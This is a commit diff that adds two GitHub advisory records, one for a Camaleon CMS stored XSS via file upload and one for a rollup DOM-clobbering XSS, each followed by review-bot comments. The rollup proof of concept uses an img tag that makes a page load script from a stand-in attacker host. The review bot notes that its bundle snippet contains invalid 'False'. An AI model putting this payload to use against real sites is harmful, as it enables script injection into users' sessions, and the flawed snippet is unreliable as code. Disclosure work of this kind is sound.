Commit 8a8eaec (1 parent: 2345167)
Showing 2 changed files with 165 additions and 0 deletions.
65 changes: 65 additions & 0 deletions
advisories/github-reviewed/2024/09/GHSA-8fx8-3rg2-79xw/GHSA-8fx8-3rg2-79xw.json
@@ -0,0 +1,65 @@ | ||
{ | ||
"schema_version": "1.4.0", | ||
"id": "GHSA-8fx8-3rg2-79xw", | ||
"modified": "2024-09-23T22:10:33Z", | ||
"published": "2024-09-23T22:10:33Z", | ||
"aliases": [ | ||
|
||
], | ||
"summary": "Camaleon CMS vulnerable to stored XSS through user file upload (GHSL-2024-184)", | ||
"details": "A stored cross-site scripting has been found in the image upload functionality that can be used by normal registered users: It is possible to upload a SVG image containing JavaScript and it's also possible to upload a HTML document when the format parameter is manually changed to [documents][1] or a string of an [unsupported format][2]. If an authenticated user or administrator visits that uploaded image or document malicious JavaScript can be executed on their behalf\n(e.g. changing or deleting content inside of the CMS.)\n\n[1]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L105-L106\n[2]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L110-L111\n\n## Impact\n\nThis issue may lead to account takeover due to reflected Cross-site scripting (XSS).\n\n## Remediation\n\nOnly allow the upload of safe files such as PNG, TXT and others or serve all \"unsafe\" files such as SVG and other files with a content-disposition: attachment header, which should prevent browsers from displaying them.\n\nAdditionally, a [Content security policy (CSP)][3] can be created that disallows inlined script. (Other parts of the application might need modification to continue functioning.)\n\n[3]: https://web.dev/articles/csp\n\nTo prevent the theft of the auth_token it could be marked with HttpOnly. This would however not prevent that actions could be performed as the authenticated user/administrator. Furthermore, it could make sense to use the authentication provided by Ruby on Rails, so that stolen tokens cannot be used anymore after some time.\n", | ||
"severity": [ | ||
{ | ||
"type": "CVSS_V3", | ||
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" | ||
}, | ||
{ | ||
"type": "CVSS_V4", | ||
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" | ||
} | ||
], | ||
"affected": [ | ||
{ | ||
"package": { | ||
"ecosystem": "RubyGems", | ||
"name": "camaleon_cms" | ||
}, | ||
"ranges": [ | ||
{ | ||
"type": "ECOSYSTEM", | ||
"events": [ | ||
{ | ||
"introduced": "0" | ||
}, | ||
{ | ||
"fixed": "2.8.1" | ||
} | ||
] | ||
} | ||
] | ||
} | ||
], | ||
"references": [ | ||
{ | ||
"type": "WEB", | ||
"url": "https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-r9cr-qmfw-pmrc" | ||
}, | ||
{ | ||
"type": "PACKAGE", | ||
"url": "https://github.com/owen2345/camaleon-cms" | ||
}, | ||
{ | ||
"type": "WEB", | ||
"url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/camaleon_cms/GHSA-r9cr-qmfw-pmrc.yml" | ||
} | ||
], | ||
"database_specific": { | ||
"cwe_ids": [ | ||
"CWE-79" | ||
], | ||
"severity": "MODERATE", | ||
"github_reviewed": true, | ||
"github_reviewed_at": "2024-09-23T22:10:33Z", | ||
"nvd_published_at": null | ||
} | ||
} |
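Review bot: The `aliases` array in this hunk is empty while the first `references` entry (and the rubysec entry that follows it) is filed under GHSA-r9cr-qmfw-pmrc, the repository-level advisory for the same Camaleon CMS upload XSS; if that identifier is the upstream record for this issue it belongs in `aliases`, and `nvd_published_at: null` is then expected since no CVE is listed. A second point on the `details` string: its Impact section says "reflected Cross-site scripting" while the summary and the opening sentence describe a stored XSS delivered through an uploaded SVG or HTML document, so the Impact wording should read "stored" to match the CVSS 3.1 vector (`UI:R`, `S:C`) chosen for it.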
100 changes: 100 additions & 0 deletions
advisories/github-reviewed/2024/09/GHSA-gcx4-mw62-g8wm/GHSA-gcx4-mw62-g8wm.json
@@ -0,0 +1,100 @@ | ||
{ | ||
"schema_version": "1.4.0", | ||
"id": "GHSA-gcx4-mw62-g8wm", | ||
"modified": "2024-09-23T22:11:02Z", | ||
"published": "2024-09-23T22:11:02Z", | ||
"aliases": [ | ||
"CVE-2024-47068" | ||
], | ||
"summary": "DOM Clobbering Gadget found in rollup bundled scripts that leads to XSS", | ||
"details": "### Summary\n\nA DOM Clobbering vulnerability was discovered in rollup when bundling scripts that use `import.meta.url` or with plugins that emit and reference asset files from code in `cjs`/`umd`/`iife` format. The DOM Clobbering gadget can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present.\n\nIt's worth noting that similar issues in other popular bundlers like Webpack ([CVE-2024-43788](https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986)) have been reported, which might serve as a good reference.\n\n### Details\n\n#### Backgrounds\n\nDOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:\n\n[1] https://scnps.co/papers/sp23_domclob.pdf\n[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/\n\n#### Gadget found in `rollup`\n\nA DOM Clobbering vulnerability in `rollup` bundled scripts was identified, particularly when the scripts uses `import.meta` and set output in format of `cjs`/`umd`/`iife`. In such cases, `rollup` replaces meta property with the URL retrieved from `document.currentScript`.\n\nhttps://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162\n\nhttps://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185\n\nHowever, this implementation is vulnerable to a DOM Clobbering attack. The `document.currentScript` lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. 
This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the `src` attribute of the attacker-controlled element (e.g., an `img` tag ) is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.\n\n### PoC\n\nConsidering a website that contains the following `main.js` script, the devloper decides to use the `rollup` to bundle up the program: `rollup main.js --format cjs --file bundle.js`.\n\n```\nvar s = document.createElement('script')\ns.src = import.meta.url + 'extra.js'\ndocument.head.append(s)\n```\n\nThe output `bundle.js` is shown in the following code snippet.\n\n```\n'use strict';\n\nvar _documentCurrentScript = typeof document !== 'undefined' ? document.currentScript : null;\nvar s = document.createElement('script');\ns.src = (typeof document === 'undefined' ? require('u' + 'rl').pathToFileURL(__filename).href : (_documentCurrentScript && False && _documentCurrentScript.src || new URL('bundle.js', document.baseURI).href)) + 'extra.js';\ndocument.head.append(s);\n```\n\nAdding the `rollup` bundled script, `bundle.js`, as part of the web page source code, the page could load the `extra.js` file from the attacker's domain, `attacker.controlled.server` due to the introduced gadget during bundling. The attacker only needs to insert an `img` tag with the name attribute set to `currentScript`. 
This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.\n\n```\n<!DOCTYPE html>\n<html>\n<head>\n <title>rollup Example</title>\n <!-- Attacker-controlled Script-less HTML Element starts--!>\n <img name=\"currentScript\" src=\"https://attacker.controlled.server/\"></img>\n <!-- Attacker-controlled Script-less HTML Element ends--!>\n</head>\n<script type=\"module\" crossorigin src=\"bundle.js\"></script>\n<body>\n</body>\n</html>\n```\n\n### Impact\n\nThis vulnerability can result in cross-site scripting (XSS) attacks on websites that include rollup-bundled files (configured with an output format of `cjs`, `iife`, or `umd` and use `import.meta`) and allow users to inject certain scriptless HTML tags without properly sanitizing the `name` or `id` attributes.\n\n### Patch\n\nPatching the following two functions with type checking would be effective mitigations against DOM Clobbering attack.\n\n```\nconst getRelativeUrlFromDocument = (relativePath: string, umd = false) =>\n\tgetResolveUrl(\n\t\t`'${escapeId(relativePath)}', ${\n\t\t\tumd ? `typeof document === 'undefined' ? location.href : ` : ''\n\t\t}document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src || document.baseURI`\n\t);\n```\n\n```\nconst getUrlFromDocument = (chunkId: string, umd = false) =>\n\t`${\n\t\tumd ? `typeof document === 'undefined' ? location.href : ` : ''\n\t}(${DOCUMENT_CURRENT_SCRIPT} && ${DOCUMENT_CURRENT_SCRIPT}.tagName.toUpperCase() === 'SCRIPT' &&${DOCUMENT_CURRENT_SCRIPT}.src || new URL('${escapeId(\n\t\tchunkId\n\t)}', document.baseURI).href)`;\n```\n", | ||
"severity": [ | ||
{ | ||
"type": "CVSS_V3", | ||
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H" | ||
}, | ||
{ | ||
"type": "CVSS_V4", | ||
"score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N" | ||
} | ||
], | ||
"affected": [ | ||
{ | ||
"package": { | ||
"ecosystem": "npm", | ||
"name": "rollup" | ||
}, | ||
"ranges": [ | ||
{ | ||
"type": "ECOSYSTEM", | ||
"events": [ | ||
{ | ||
"introduced": "0" | ||
}, | ||
{ | ||
"fixed": "3.29.5" | ||
} | ||
] | ||
} | ||
] | ||
}, | ||
{ | ||
"package": { | ||
"ecosystem": "npm", | ||
"name": "rollup" | ||
}, | ||
"ranges": [ | ||
{ | ||
"type": "ECOSYSTEM", | ||
"events": [ | ||
{ | ||
"introduced": "4.0.0" | ||
}, | ||
{ | ||
"fixed": "4.22.4" | ||
} | ||
] | ||
} | ||
] | ||
} | ||
], | ||
"references": [ | ||
{ | ||
"type": "WEB", | ||
"url": "https://github.com/rollup/rollup/security/advisories/GHSA-gcx4-mw62-g8wm" | ||
}, | ||
{ | ||
"type": "ADVISORY", | ||
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47068" | ||
}, | ||
{ | ||
"type": "WEB", | ||
"url": "https://github.com/rollup/rollup/commit/2ef77c00ec2635d42697cff2c0567ccc8db34fb4" | ||
}, | ||
{ | ||
"type": "WEB", | ||
"url": "https://github.com/rollup/rollup/commit/e2552c9e955e0a61f70f508200ee9f752f85a541" | ||
}, | ||
{ | ||
"type": "PACKAGE", | ||
"url": "https://github.com/rollup/rollup" | ||
}, | ||
{ | ||
"type": "WEB", | ||
"url": "https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162" | ||
}, | ||
{ | ||
"type": "WEB", | ||
"url": "https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185" | ||
} | ||
], | ||
"database_specific": { | ||
"cwe_ids": [ | ||
"CWE-79" | ||
], | ||
"severity": "HIGH", | ||
"github_reviewed": true, | ||
"github_reviewed_at": "2024-09-23T22:11:02Z", | ||
"nvd_published_at": "2024-09-23T16:15:06Z" | ||
} | ||
} |
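Review bot: The `bundle.js` snippet inside the `details` string reads `_documentCurrentScript && False && _documentCurrentScript.src`, and `False` is not a JavaScript identifier: when `_documentCurrentScript` is truthy (the normal case, and the clobbered case) the expression throws a ReferenceError, and a lowercase `false` would always short-circuit to the `new URL('bundle.js', document.baseURI)` fallback, so as written the PoC output cannot use the clobbered element's `src` as the surrounding text claims. The patched versions shown later in the same string have no such operand, so the pre-patch expression presumably read `_documentCurrentScript && _documentCurrentScript.src`; the snippet should be corrected to that form. Two smaller points: the two CVSS vectors disagree on privileges (v3.1 has `PR:L`, v4.0 has `PR:N`) and should be reconciled with the Details text, which requires only that attacker-controlled scriptless HTML be present on the page; and the HTML PoC closes its comments with `--!>` and uses a `</img>` end tag, both parse errors that browsers tolerate but that a copied example should not carry (the Details text also has the typo `devloper`).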